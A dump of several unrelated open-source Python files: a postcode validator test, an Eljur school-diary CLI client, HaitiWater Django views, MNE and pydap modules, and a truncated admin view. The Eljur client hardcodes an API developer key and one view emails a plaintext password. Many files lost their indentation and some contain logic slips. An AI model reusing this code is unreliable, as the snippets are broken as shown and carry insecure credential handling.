postcode_validator.validate("wc2b6se")
postcode_validator.validate("wc2b 6se")
postcode_validator.validate("Wc2b 6se")
except DataDoesNotMatchSchemaException as e:
self.fail("Could not validate postcode: " + repr(e))
def test_does_not_validate_invalid_postcode(self):
self.assertRaises(DataDoesNotMatchSchemaException, postcode_validator.validate, "sausages")
self.assertRaises(DataDoesNotMatchSchemaException, postcode_validator.validate, "")
self.assertRaises(DataDoesNotMatchSchemaException, postcode_validator.validate, 123)
def test_can_convert_postcode_to_canonical_form(self):
self.assertEqual(postcode_validator.to_canonical_form("wc2B6sE"), "WC2B 6SE")
self.assertEqual(postcode_validator.to_canonical_form('pl11aa'), 'PL1 1AA')
self.assertEqual(postcode_validator.to_canonical_form('pl132aa'), 'PL13 2AA')
self.assertEqual(postcode_validator.to_canonical_form('pl13 2aa'), 'PL13 2AA')
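# Added for convenience (not in the original file): allows running the tests directly.
if __name__ == '__main__':
    unittest.main()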
# ---- end of file: tests/test_postcode_validation.py (repo: LandRegistry/datatypes-alpha, license: MIT) ----
from colored import fg, stylize, attr
import requests as rq
from yaspin import yaspin
version = "0.4beta"
greeting = stylize("""
╭────────────────────────────────────────────────────────────────╮
│ Добро пожаловать в │
│ _____ _ _ ____ _ ___ │
│ | ____| |(_)_ _ _ __ / ___| | |_ _| │
│ | _| | || | | | | '__| | | | | | │
│ | |___| || | |_| | | | |___| |___ | | │
│ |_____|_|/ |\__,_|_| \____|_____|___| │
│ |__/ │
│ вер. 0.6.1beta │
╰────────────────────────────────────────────────────────────────╯
""", fg("magenta"), attr("bold"))
API_URL = "https://markbook.eljur.ru/apiv3/"
DEVKEY = "9235e26e80ac2c509c48fe62db23642c"
VENDOR = "markbook"
lessons = []
time_style = fg("green") + attr("bold")
room_style = fg("yellow") + attr("bold")
day_of_week_style = fg("orange_1") + attr("bold")
non_academ_style = fg("cyan")
separator_style = fg("medium_purple_1") + attr("bold")
separator = stylize("::", separator_style)
# yakuri354 - Used to mark the times of free periods ("windows") in the schedule
# butukay - I'd call this a crutch } < Can't delete it
# yakuri354 ~> well, I agree, but how else would we display the free periods
lessons_time = {
"1": "08:30:00_09:10:00",
"2": "09:30:00_10:10:00",
"3": "10:20:00_11:00:00",
"4": "11:10:00_11:50:00",
"5": "12:00:00_12:40:00",
"6": "13:30:00_14:10:00",
"7": "14:20:00_15:00:00",
"8": "15:10:00_15:50:00",
"9": "16:20:00_17:00:00",
"10": "17:10:00_17:50:00",
"11": "18:00:00_18:40:00"
}
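# Illustrative note (added): each value encodes "start_end" times for a lesson slot,
# so a free period in slot 3 can be displayed by splitting lessons_time["3"] on "_"
# into 10:20:00 and 11:00:00.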
# Student object
class Student:
def __init__(self, token=None, login=None):
self.token = token
self.login = login
rules_params = {
"DEVKEY": DEVKEY,
"vendor": VENDOR,
"out_format": "json",
"auth_token": self.token,
}
user_info = rq.get(API_URL + "getrules", params=rules_params).json()["response"]
if user_info["error"] is not None or "":
print("Ошибка при получении информации об ученике: " + user_info["error"])
raise LookupError(user_info["error"])
self.student_id = user_info["result"]["name"]
self.name = user_info["result"]["relations"]["students"][self.student_id]["title"]
self.grade = user_info["result"]["relations"]["students"][self.student_id]["class"]
self.city = user_info["result"]["city"]
self.email = user_info["result"]["email"]
self.fullname = user_info["result"]["title"]
self.gender = user_info["result"]["gender"]
self.school = user_info["result"]["relations"]["schools"][0]["title"]
def __str__(self):
text = ""
text += "\nИмя: " + self.name
text += "\nКласс: " + str(self.grade)
text += "\nГород: " + self.city
text += "\nШкола: " + self.school
text += "\nПол: " + "Мужской" if self.gender == "male" else "Женский"
text += "\nЛогин: " + self.login
text += "\nЭл. Почта: " + self.email
return text
def get_schedule(self, date=None, silent=False):
load_spinner = None
if not silent:
load_spinner = yaspin(text="Загрузка...")
load_spinner.text = "[Получение дневника из журнала...]"
if date is None:
date = "20191118-20191124"
diary = rq.get(
API_URL + "getschedule",
params={
"devkey": DEVKEY,
"vendor": VENDOR,
"out_format": "json",
"student": self.student_id,
"auth_token": self.token,
"days": date,
"rings": "true"
}
).json()['response']
if diary["error"] is not None:
if not silent:
load_spinner.text = ""
load_spinner.fail(stylize("Ошибка получения расписания: " + diary["error"], fg("red")))
raise LookupError(diary["error"])
schedule = diary['result']['students'][str(self.student_id)]
if not silent:
load_spinner.text = ""
load_spinner.ok(stylize("[Расписание успешно получено!] ", fg("green")))
return schedule
    # Retrieve student information via the getrules request
def info(self, extended=False):
if not extended:
return self.student_id, self.name, self.grade
else:
return {
"student_id": self.student_id,
"fullname": self.name,
"grade": self.grade,
"city": self.city,
"email": self.email,
"gender": self.gender,
"school": self.school
}
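# Hypothetical usage sketch (the token and login are placeholders, not real credentials):
# student = Student(token="<auth_token>", login="ivanov")
# print(student.info())
# schedule = student.get_schedule("20191118-20191124")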
# ---- end of file: eljur.py (repo: yakuri354/EljurCLI, license: MIT) ----
from datetime import date
from dateutil.relativedelta import relativedelta
from django.contrib.auth.models import Group
from django.contrib.gis.geos import GEOSGeometry
from django.core.mail import send_mail
from ..api.get_table import *
from ..utils.get_data import has_access, is_int, is_float
from ..water_network.models import ElementType
def log_element(elem, request):
transaction = Transaction(user=request.user)
transaction.save()
elem.save()
elem.log_add(transaction)
def add_consumer_element(request):
first_name = request.POST.get("firstname", None)
last_name = request.POST.get("lastname", None)
gender = request.POST.get("gender", None)
address = request.POST.get("address", None)
sub = request.POST.get("subconsumer", None)
phone = request.POST.get("phone", None)
outlet_id = request.POST.get("mainOutlet", None)
if sub is None or not is_int(sub):
return HttpResponse("Impossible, certains champs devraient être des entiers", status=400)
outlet = Element.objects.filter(id=outlet_id).first()
if outlet is None:
return HttpResponse("La sortie d'eau spécifiée n'a pas été trouvée, "
"impossible d'ajouter le consommateur", status=400)
if not has_access(outlet, request):
return HttpResponse("Vous n'avez pas les droits sur cet élément de réseau", status=403)
consumer = Consumer(last_name=last_name, first_name=first_name, gender=gender, location=address,
phone_number=phone, household_size=sub, water_outlet=outlet) # Creation
log_element(consumer, request)
if outlet.type != ElementType.INDIVIDUAL.name:
price, duration = outlet.get_price_and_duration()
creation = date.today()
expiration = creation + relativedelta(months=duration)
invoice = Invoice(consumer=consumer, water_outlet=outlet, amount=price,
creation=creation, expiration=expiration)
invoice.save()
json_object = {
'data': consumer.descript(),
'type': 'add',
'table': 'consumer'
}
return HttpResponse(json.dumps(json_object), status=200)
def add_network_element(request):
if request.user.profile.zone is None:
return HttpResponse("Vous n'êtes pas connecté en tant que gestionnaire de zone", status=403)
type = request.POST.get("type", None).upper()
loc = request.POST.get("localization", None)
state = request.POST.get("state", None).upper()
name = ElementType[type].value + " " + loc
zone = Zone.objects.filter(name=request.user.profile.zone).first()
if zone is None:
return HttpResponse("Impossible de trouver la zone gérée pas l'utilisateur", status=400)
element = Element(name=name, type=type, status=state, location=loc, zone=zone) # Creation
log_element(element, request)
json_object = {
'data': element.network_descript(),
'type': 'add',
'table': 'water_element'
}
return HttpResponse(json.dumps(json_object), status=200)
def add_report_element(request):
values = json.loads(request.body.decode("utf-8"))
for index, elem in enumerate(values["selectedOutlets"]):
outlet = Element.objects.filter(id=elem).first()
if outlet is None:
return HttpResponse("La sortie d'eau concernée par ce rapport n'a pas été trouvée", status=400)
if not has_access(outlet, request):
return HttpResponse("Vous n'avez pas les droits sur cet élément de réseau", status=403)
active = values["isActive"]
if active:
hour_activity = values["inputHours"]
day_activity = values["inputDays"]
if not is_int(hour_activity) or not is_int(day_activity):
return HttpResponse("Impossible, certains champs devraient être des entiers", status=400)
data = values["details"][index]["perCubic"] != "none"
if data:
meters_distr = values["details"][index]["cubic"]
value_meter = values["details"][index]["perCubic"]
recette = values["details"][index]["bill"]
if not is_float(meters_distr) or not is_float(value_meter) or not is_float(recette):
return HttpResponse("Impossible, certains champs devraient être des entiers", status=400)
report_line = Report(water_outlet=outlet, was_active=active, has_data=data,
hours_active=hour_activity, days_active=day_activity,
quantity_distributed=meters_distr, price=value_meter, recette=recette)
if outlet.type == ElementType.INDIVIDUAL.name: # Create an invoice for individual outlets
consumer = Consumer.objects.filter(water_outlet=outlet).first()
if consumer is not None:
amount = int(meters_distr) * int(value_meter)
creation = date.today()
expiration = creation + relativedelta(months=1)
invoice = Invoice(consumer=consumer, water_outlet=outlet, creation=creation,
expiration=expiration, amount=amount)
invoice.save()
else:
report_line = Report(water_outlet=outlet, was_active=active, has_data=data,
hours_active=hour_activity, days_active=day_activity)
if outlet.type == ElementType.INDIVIDUAL.name:
consumer = Consumer.objects.filter(water_outlet=outlet).first()
if consumer is not None:
amount = outlet.zone.indiv_base_price
creation = date.today()
expiration = creation + relativedelta(months=1)
invoice = Invoice(consumer=consumer, water_outlet=outlet, creation=creation,
expiration=expiration, amount=amount)
invoice.save()
else:
report_line = Report(water_outlet=outlet, was_active=active)
log_element(report_line, request)
return HttpResponse(status=200)
def add_zone_element(request):
if request.user.profile.zone is None:
return HttpResponse("Vous n'êtes pas connecté en tant que gestionnaire de zone", status=403)
name = request.POST.get("name", None)
fountain_price = request.POST.get("fountain-price", 0)
fountain_duration = request.POST.get("fountain-duration", 1)
kiosk_price = request.POST.get("kiosk-price", 0)
kiosk_duration = request.POST.get("kiosk-duration", 1)
indiv_base_price = request.POST.get("indiv-price", 0)
if not is_int(fountain_price) or not is_int(fountain_duration) \
or not is_int(kiosk_price) or not is_int(kiosk_duration) \
or not is_int(indiv_base_price):
return HttpResponse("Impossible, certains champs devraient être des entiers", status=400)
if Zone.objects.filter(name=name).first() is not None:
return HttpResponse("Une zone avec ce nom existe déjà dans l'application, "
"veuillez en choisir un autre", status=400)
superzone = Zone.objects.filter(name=request.user.profile.zone).first()
if superzone is None:
return HttpResponse("Impossible de trouver la zone gérée pas l'utilisateur", status=400)
zone = Zone(name=name, superzone=superzone, subzones=[name],
fountain_price=fountain_price, fountain_duration=fountain_duration,
kiosk_price=kiosk_price, kiosk_duration=kiosk_duration,
indiv_base_price=indiv_base_price)
while superzone is not None:
superzone.subzones.append(name)
superzone.save()
superzone = superzone.superzone
log_element(zone, request)
json_object = {
'data': zone.descript(),
'type': 'add',
'table': 'zone'
}
return HttpResponse(json.dumps(json_object), status=200)
def add_collaborator_element(request):
if request.user.profile.zone is None:
return HttpResponse("Vous n'êtes pas connecté en tant que gestionnaire de zone", status=403)
first_name = request.POST.get("firstname", None)
last_name = request.POST.get("lastname", None)
username = request.POST.get("id", None)
password = User.objects.make_random_password() # New random password
email = request.POST.get("email", None)
type = request.POST.get("type", None)
phone = request.POST.get("phone", None)
if User.objects.filter(username=username).first() is not None:
return HttpResponse("Cet utilisateur existe déjà ! Vérifier que son identifiant est bien unique", status=400)
user = User.objects.create_user(username=username, email=email, password=password,
first_name=first_name, last_name=last_name)
user.profile.phone_number = phone
if type == "fountain-manager":
outlet_ids = request.POST.get("outlets", None).split(',')
if len(outlet_ids) < 1:
user.delete()
return HttpResponse("Vous n'avez pas choisi de fontaine a attribuer !", status=400)
outlets = Element.objects.filter(id__in=outlet_ids) if len(outlet_ids) > 1 else \
Element.objects.filter(id=outlet_ids[0])
if len(outlets) < 1:
user.delete()
return HttpResponse("Impossible d'attribuer cette fontaine au gestionnaire", status=400)
for outlet in outlets:
if not has_access(outlet, request):
user.delete()
return HttpResponse("Vous n'avez pas les droits sur cet élément de réseau", status=403)
outlet.manager_names = outlet.get_managers()
outlet.save()
user.profile.outlets.append(outlet.id)
my_group = Group.objects.get(name='Gestionnaire de fontaine')
my_group.user_set.add(user)
tab = [user.username, user.last_name, user.first_name, user.profile.get_phone_number(),
user.email, "Gestionnaire de fontaine", user.profile.get_zone(), user.profile.outlets]
elif type == "zone-manager":
zone_id = request.POST.get("zone", None)
zone = Zone.objects.filter(id=zone_id).first()
if zone is None:
user.delete()
return HttpResponse("Impossible d'attribuer cette zone au gestionnaire", status=400)
if zone.name not in request.user.profile.zone.subzones:
user.delete()
return HttpResponse("Vous n'avez pas les droits sur cette zone", status=403)
user.profile.zone = zone
my_group = Group.objects.get(name='Gestionnaire de zone')
my_group.user_set.add(user)
tab = [user.username, user.last_name, user.first_name, user.profile.get_phone_number(),
user.email, "Gestionnaire de zone", user.profile.zone.name, user.profile.outlets]
else:
user.delete()
return HttpResponse("Impossible d'ajouter l'utilisateur", status=400)
send_mail('Bienvenue sur haitiwater !',
'Bienvenue sur haitiwater. Voici votre mot de passe autogénéré : ' + password + '\n' +
'Veuillez vous connecter pour le modifier.\n' +
'Pour rappel, votre identifiant est : ' + username,
'', [email], fail_silently=False)
log_element(user.profile, request)
json_object = {
'data': tab,
'type': 'add',
'table': 'manager'
}
return HttpResponse(json.dumps(json_object), status=200)
def add_ticket_element(request):
outlet_id = request.POST.get("id_outlet", None)
type = request.POST.get("type", None).upper()
comment = request.POST.get("comment", None)
urgency = request.POST.get('urgency', None).upper()
image = request.FILES.get("picture", None)
outlet = Element.objects.filter(id=outlet_id).first()
if outlet is None:
return HttpResponse("Impossible de trouver la sortie d'eau correspondante au ticket", status=400)
if not has_access(outlet, request):
return HttpResponse("Vous n'avez pas les droits sur cet élément de réseau", status=403)
if image:
import uuid
extension = image.name.split(".")
filename = str(uuid.uuid4())
        image.name = filename + "." + extension[-1]  # keep the real extension even if the name contains dots
ticket = Ticket(water_outlet=outlet, type=type, comment=comment, urgency=urgency, image=image)
log_element(ticket, request)
json_object = {
'data': ticket.descript(),
'type': 'add',
'table': 'ticket'
}
return HttpResponse(json.dumps(json_object), status=200)
def add_payment_element(request):
id_consumer = request.POST.get("id_consumer", None)
amount = request.POST.get("amount", None)
if not is_float(amount):
return HttpResponse("Impossible, certains champs devraient être des entiers", status=400)
consumer = Consumer.objects.filter(id=id_consumer).first()
if not consumer:
return HttpResponse("Impossible de trouver l'utilisateur", status=400)
elif not has_access(consumer.water_outlet, request):
return HttpResponse("Vous n'avez pas les droits sur ce consommateur", status=403)
outlet = consumer.water_outlet
payment = Payment(consumer=consumer, water_outlet=outlet, amount=amount)
log_element(payment, request)
json_object = {
'data': payment.descript(),
'type': 'add',
'table': 'payment',
'consumer': payment.infos()["Identifiant consommateur"]
}
return HttpResponse(json.dumps(json_object), status=200)
def add_location_element(request, elem):
body = request.body.decode('utf-8')
json_value = json.loads(body)
poly = GEOSGeometry(str(json_value["geometry"]))
lon, lat = 0, 0
if len(poly.coord_seq) == 1:
lon, lat = poly[0], poly[1]
loc = Location(elem=elem, lat=lat, lon=lon, poly=poly, json_representation=body)
log_element(loc, request)
json_object = {
'data': [loc.elem.name, loc.json_representation],
'type': 'add',
'id': loc.elem.id,
'table': 'water_element_details'
}
return HttpResponse(json.dumps(json_object), status=200)
| 39.714681 | 117 | 0.645812 | [
"MIT"
] | exavince/HaitiWater | code/haitiwater/apps/api/add_table.py | 14,381 | Python |
from datasets.data import documents,data
for doc in documents.find():
    print(doc['admitted'])
| 24.25 | 40 | 0.742268 | [
"MIT"
] | pmwaniki/ppg-analysis | datasets/descriptives.py | 97 | Python |
# Author: Luke Bloy <[email protected]>
#
# License: BSD (3-clause)
import numpy as np
import os.path as op
import datetime
import calendar
from .utils import _load_mne_locs
from ...utils import logger, warn
from ..utils import _read_segments_file
from ..base import BaseRaw
from ..meas_info import _empty_info
from ..constants import FIFF
def read_raw_artemis123(input_fname, preload=False, verbose=None):
"""Read Artemis123 data as raw object.
Parameters
----------
input_fname : str
Path to the data file (extension ``.bin``). The header file with the
same file name stem and an extension ``.txt`` is expected to be found
in the same directory.
preload : bool or str (default False)
Preload data into memory for data manipulation and faster indexing.
If True, the data will be preloaded into memory (fast, requires
large amount of memory). If preload is a string, preload is the
file name of a memory-mapped file which is used to store the data
on the hard drive (slower, requires less memory).
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
raw : Instance of Raw
A Raw object containing the data.
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
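    Examples
    --------
    Illustrative only; the file name below is hypothetical but follows the
    scanner's ``Artemis_Data_YYYY-MM-DD-HHh-MMm_*.bin`` naming convention.
    >>> raw = read_raw_artemis123('Artemis_Data_2017-01-01-10h-00m_a.bin')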
"""
return RawArtemis123(input_fname, preload=preload, verbose=verbose)
def _get_artemis123_info(fname):
"""Function for extracting info from artemis123 header files."""
fname = op.splitext(op.abspath(fname))[0]
header = fname + '.txt'
logger.info('Reading header...')
# key names for artemis channel info...
chan_keys = ['name', 'scaling', 'FLL_Gain', 'FLL_Mode', 'FLL_HighPass',
'FLL_AutoReset', 'FLL_ResetLock']
header_info = dict()
header_info['filter_hist'] = []
header_info['comments'] = ''
header_info['channels'] = []
with open(header, 'r') as fid:
# section flag
# 0 - None
# 1 - main header
# 2 - channel header
# 3 - comments
# 4 - length
# 5 - filtering History
sectionFlag = 0
for line in fid:
# skip emptylines or header line for channel info
if ((not line.strip()) or
(sectionFlag == 2 and line.startswith('DAQ Map'))):
continue
# set sectionFlag
if line.startswith('<end'):
sectionFlag = 0
elif line.startswith("<start main header>"):
sectionFlag = 1
elif line.startswith("<start per channel header>"):
sectionFlag = 2
elif line.startswith("<start comments>"):
sectionFlag = 3
elif line.startswith("<start length>"):
sectionFlag = 4
elif line.startswith("<start filtering history>"):
sectionFlag = 5
else:
# parse header info lines
# part of main header - lines are name value pairs
if sectionFlag == 1:
values = line.strip().split('\t')
if len(values) == 1:
values.append('')
header_info[values[0]] = values[1]
# part of channel header - lines are Channel Info
elif sectionFlag == 2:
values = line.strip().split('\t')
if len(values) != 7:
raise IOError('Error parsing line \n\t:%s\n' % line +
'from file %s' % header)
tmp = dict()
for k, v in zip(chan_keys, values):
tmp[k] = v
header_info['channels'].append(tmp)
elif sectionFlag == 3:
header_info['comments'] = '%s%s' \
% (header_info['comments'], line.strip())
elif sectionFlag == 4:
header_info['num_samples'] = int(line.strip())
elif sectionFlag == 5:
header_info['filter_hist'].append(line.strip())
for k in ['Temporal Filter Active?', 'Decimation Active?',
'Spatial Filter Active?']:
if(header_info[k] != 'FALSE'):
            warn('%s - is set, but is not supported' % k)
if(header_info['filter_hist']):
        warn('Non-empty filter history found, BUT is not supported')
# build mne info struct
info = _empty_info(float(header_info['Rate Out']))
# Attempt to get time/date from fname
# Artemis123 files saved from the scanner observe the following
# naming convention 'Artemis_Data_YYYY-MM-DD-HHh-MMm_[chosen by user].bin'
try:
date = datetime.datetime.strptime(
op.basename(fname).split('_')[2], '%Y-%m-%d-%Hh-%Mm')
meas_date = calendar.timegm(date.utctimetuple())
except Exception:
meas_date = None
# build subject info
subject_info = {'id': header_info['Subject ID']}
# build description
desc = ''
for k in ['Purpose', 'Notes']:
desc += '{} : {}\n'.format(k, header_info[k])
desc += 'Comments : {}'.format(header_info['comments'])
info = _empty_info(float(header_info['Rate Out']))
info.update({'filename': fname, 'meas_date': meas_date,
'description': desc, 'buffer_size_sec': 1.,
'subject_info': subject_info,
'proj_name': header_info['Project Name']})
# Channel Names by type
ref_mag_names = ['REF_001', 'REF_002', 'REF_003',
'REF_004', 'REF_005', 'REF_006']
ref_grad_names = ['REF_007', 'REF_008', 'REF_009',
'REF_010', 'REF_011', 'REF_012']
# load mne loc dictionary
loc_dict = _load_mne_locs()
info['chs'] = []
info['bads'] = []
for i, chan in enumerate(header_info['channels']):
# build chs struct
t = {'cal': float(chan['scaling']), 'ch_name': chan['name'],
'logno': i + 1, 'scanno': i + 1, 'range': 1.0,
'unit_mul': FIFF.FIFF_UNITM_NONE,
'coord_frame': FIFF.FIFFV_COORD_DEVICE}
t['loc'] = loc_dict.get(chan['name'], np.zeros(12))
if (chan['name'].startswith('MEG')):
t['coil_type'] = FIFF.FIFFV_COIL_ARTEMIS123_GRAD
t['kind'] = FIFF.FIFFV_MEG_CH
# While gradiometer units are T/m, the meg sensors referred to as
# gradiometers report the field difference between 2 pick-up coils.
# Therefore the units of the measurements should be T
# *AND* the baseline (difference between pickup coils)
# should not be used in leadfield / forwardfield computations.
t['unit'] = FIFF.FIFF_UNIT_T
t['unit_mul'] = FIFF.FIFF_UNITM_F
        # 3-axis reference magnetometers
elif (chan['name'] in ref_mag_names):
t['coil_type'] = FIFF.FIFFV_COIL_ARTEMIS123_REF_MAG
t['kind'] = FIFF.FIFFV_REF_MEG_CH
t['unit'] = FIFF.FIFF_UNIT_T
t['unit_mul'] = FIFF.FIFF_UNITM_F
# reference gradiometers
elif (chan['name'] in ref_grad_names):
t['coil_type'] = FIFF.FIFFV_COIL_ARTEMIS123_REF_GRAD
t['kind'] = FIFF.FIFFV_REF_MEG_CH
# While gradiometer units are T/m, the meg sensors referred to as
# gradiometers report the field difference between 2 pick-up coils.
# Therefore the units of the measurements should be T
# *AND* the baseline (difference between pickup coils)
# should not be used in leadfield / forwardfield computations.
t['unit'] = FIFF.FIFF_UNIT_T
t['unit_mul'] = FIFF.FIFF_UNITM_F
# other reference channels are unplugged and should be ignored.
elif (chan['name'].startswith('REF')):
t['coil_type'] = FIFF.FIFFV_COIL_NONE
t['kind'] = FIFF.FIFFV_MISC_CH
t['unit'] = FIFF.FIFF_UNIT_V
info['bads'].append(t['ch_name'])
elif (chan['name'].startswith(('AUX', 'TRG', 'MIO'))):
t['coil_type'] = FIFF.FIFFV_COIL_NONE
t['unit'] = FIFF.FIFF_UNIT_V
if (chan['name'].startswith('TRG')):
t['kind'] = FIFF.FIFFV_STIM_CH
else:
t['kind'] = FIFF.FIFFV_MISC_CH
else:
raise ValueError('Channel does not match expected' +
' channel Types:"%s"' % chan['name'])
        # incorporate multiplier (unit_mul) into calibration
t['cal'] *= 10 ** t['unit_mul']
t['unit_mul'] = FIFF.FIFF_UNITM_NONE
# append this channel to the info
info['chs'].append(t)
if (chan['FLL_ResetLock'] == 'TRUE'):
info['bads'].append(t['ch_name'])
# reduce info['bads'] to unique set
info['bads'] = list(set(info['bads']))
info._update_redundant()
return info, header_info
class RawArtemis123(BaseRaw):
"""Raw object from Artemis123 file.
Parameters
----------
input_fname : str
Path to the Artemis123 data file (ending in ``'.bin'``).
preload : bool or str (default False)
Preload data into memory for data manipulation and faster indexing.
If True, the data will be preloaded into memory (fast, requires
large amount of memory). If preload is a string, preload is the
file name of a memory-mapped file which is used to store the data
on the hard drive (slower, requires less memory).
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
def __init__(self, input_fname, preload=False, verbose=None): # noqa: D102
info, header_info = _get_artemis123_info(input_fname)
last_samps = [header_info['num_samples'] - 1]
super(RawArtemis123, self).__init__(
info, preload, filenames=[input_fname], raw_extras=[header_info],
last_samps=last_samps, orig_format=np.float32,
verbose=verbose)
def _read_segment_file(self, data, idx, fi, start, stop, cals, mult):
"""Read a chunk of raw data."""
_read_segments_file(self, data, idx, fi, start,
stop, cals, mult, dtype='>f4')
| 38.933086 | 79 | 0.575862 | [
"BSD-3-Clause"
] | mvdoc/mne-python | mne/io/artemis123/artemis123.py | 10,473 | Python |
"""The DAS response.
The DAS response describes the attributes associated with a dataset and its
variables. Together with the DDS the DAS response completely describes the
metadata of a dataset, allowing it to be introspected and data to be
downloaded.
"""
try:
from functools import singledispatch
except ImportError:
from singledispatch import singledispatch
from collections import Iterable
from six import string_types, integer_types
from six.moves import map
import numpy as np
from ..model import (DatasetType, BaseType,
StructureType, SequenceType,
GridType)
from ..lib import encode, quote, __version__, NUMPY_TO_DAP2_TYPEMAP
from .lib import BaseResponse
INDENT = ' ' * 4
class DASResponse(BaseResponse):
"""The DAS response."""
__version__ = __version__
def __init__(self, dataset):
BaseResponse.__init__(self, dataset)
self.headers.extend([
('Content-description', 'dods_das'),
('Content-type', 'text/plain; charset=ascii'),
])
def __iter__(self):
for line in das(self.dataset):
try:
yield line.encode('ascii')
except UnicodeDecodeError:
yield line.encode('UTF-8')
@singledispatch
def das(var, level=0):
"""Single dispatcher that generates the DAS response."""
raise StopIteration
@das.register(DatasetType)
def _datasettype(var, level=0):
yield '{indent}Attributes {{\n'.format(indent=level*INDENT)
for attr in sorted(var.attributes.keys()):
values = var.attributes[attr]
for line in build_attributes(attr, values, level+1):
yield line
for child in var.children():
for line in das(child, level=level+1):
yield line
yield '{indent}}}\n'.format(indent=level*INDENT)
@das.register(StructureType)
@das.register(SequenceType)
def _structuretype(var, level=0):
yield '{indent}{name} {{\n'.format(indent=level*INDENT, name=var.name)
for attr in sorted(var.attributes.keys()):
values = var.attributes[attr]
for line in build_attributes(attr, values, level+1):
yield line
for child in var.children():
for line in das(child, level=level+1):
yield line
yield '{indent}}}\n'.format(indent=level*INDENT)
@das.register(BaseType)
@das.register(GridType)
def _basetypegridtype(var, level=0):
yield '{indent}{name} {{\n'.format(indent=level*INDENT, name=var.name)
for attr in sorted(var.attributes.keys()):
values = var.attributes[attr]
if np.asarray(values).size > 0:
for line in build_attributes(attr, values, level+1):
yield line
yield '{indent}}}\n'.format(indent=level*INDENT)
def build_attributes(attr, values, level=0):
"""Recursive function to build the DAS."""
# check for metadata
if isinstance(values, dict):
yield '{indent}{attr} {{\n'.format(indent=(level)*INDENT, attr=attr)
for k, v in values.items():
for line in build_attributes(k, v, level+1):
yield line
yield '{indent}}}\n'.format(indent=(level)*INDENT)
else:
# get type
type = get_type(values)
# encode values
if (isinstance(values, string_types) or
not isinstance(values, Iterable) or
getattr(values, 'shape', None) == ()):
values = [encode(values)]
else:
values = map(encode, values)
yield '{indent}{type} {attr} {values};\n'.format(
indent=(level)*INDENT,
type=type,
attr=quote(attr),
values=', '.join(values))
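# Illustrative output of build_attributes('units', 'ms') at level 1, assuming
# encode() quotes string values: '    String units "ms";\n'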
def get_type(values):
"""Extract the type of a variable.
This function tries to determine the DAP type of a Python variable using
several methods. Returns the DAP type as a string.
"""
if hasattr(values, 'dtype'):
return NUMPY_TO_DAP2_TYPEMAP[values.dtype.char]
elif isinstance(values, string_types) or not isinstance(values, Iterable):
return type_convert(values)
else:
# if there are several values, they may have different types, so we
# need to convert all of them and use a precedence table
types = [type_convert(val) for val in values]
precedence = ['String', 'Float64', 'Int32']
types.sort(key=precedence.index)
return types[0]
def type_convert(obj):
"""Map Python objects to the corresponding Opendap types.
Returns the DAP representation of the type as a string.
"""
if isinstance(obj, float):
return 'Float64'
elif isinstance(obj, integer_types):
return 'Int32'
else:
return 'String'
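# Illustrative examples: type_convert(1) -> 'Int32', type_convert(2.5) ->
# 'Float64', type_convert('up') -> 'String'.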
| 29.216049 | 78 | 0.637439 | [
"MIT"
] | JohnMLarkin/pydap | src/pydap/responses/das.py | 4,733 | Python |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-11-11 04:06
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='SignedTermsAndConditions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='TermsAndConditions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField(auto_now_add=True, help_text='Date of publication', verbose_name='Creation date')),
                ('markdown', models.TextField(editable=False, help_text='Formatted in Markdown', verbose_name='Terms and conditions')),
],
),
migrations.AddField(
model_name='signedtermsandconditions',
name='terms',
field=models.ForeignKey(help_text='Terms agreed with user', on_delete=django.db.models.deletion.CASCADE, to='terms.TermsAndConditions'),
),
migrations.AddField(
model_name='signedtermsandconditions',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| 37.136364 | 148 | 0.639535 | [
"MIT"
] | niwo/seven23_server | seven23/models/terms/migrations/0001_initial.py | 1,634 | Python |
# pypi
from pyramid.httpexceptions import HTTPFound
from pyramid.view import view_config
# local
from ..lib.handler import Handler
from ...lib import db as lib_db
from ...lib import errors
from ...model import utils as model_utils
# ==============================================================================
class ViewAdminOperations(Handler):
def _parse__event_type(self):
event_type = self.request.params.get("event_type", None)
event_type_id = None
if event_type:
try:
event_type_id = model_utils.OperationsEventType.from_string(event_type)
except AttributeError:
event_type = None
return (event_type, event_type_id)
def _parse__event_type_ids(self):
"""turns the request's `event_type=operations__update_recents__global` into an id."""
event_type_id = None
event_type = self.request.params.get("event_type", None)
if event_type:
try:
event_type_id = model_utils.OperationsEventType.from_string(event_type)
except AttributeError:
event_type = None
event_type_id = None
if event_type_id:
return (event_type_id,)
return None
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(route_name="admin:operations", renderer=None)
def operations(self):
return HTTPFound(
"%s/operations/log"
% self.request.registry.settings["app_settings"]["admin_prefix"]
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:operations:log", renderer="/admin/operations-log.mako"
)
@view_config(
route_name="admin:operations:log_paginated",
renderer="/admin/operations-log.mako",
)
def operations_log(self):
_items_per_page = 25
(event_type, event_type_id) = self._parse__event_type()
event_type_ids = (event_type_id,) if event_type_id else None
items_count = lib_db.get.get__OperationsEvent__count(
self.request.api_context, event_type_ids=event_type_ids
)
_url_template = (
"%s/operations/log/{0}"
% self.request.registry.settings["app_settings"]["admin_prefix"]
)
if event_type:
_url_template = "%s/operations/log/{0}?event_type=%s" % (
self.request.registry.settings["app_settings"]["admin_prefix"],
event_type,
)
(pager, offset) = self._paginate(
items_count, url_template=_url_template, items_per_page=_items_per_page
)
items_paged = lib_db.get.get__OperationsEvent__paginated(
self.request.api_context,
event_type_ids=event_type_ids,
limit=_items_per_page,
offset=offset,
)
return {
"project": "peter_sslers",
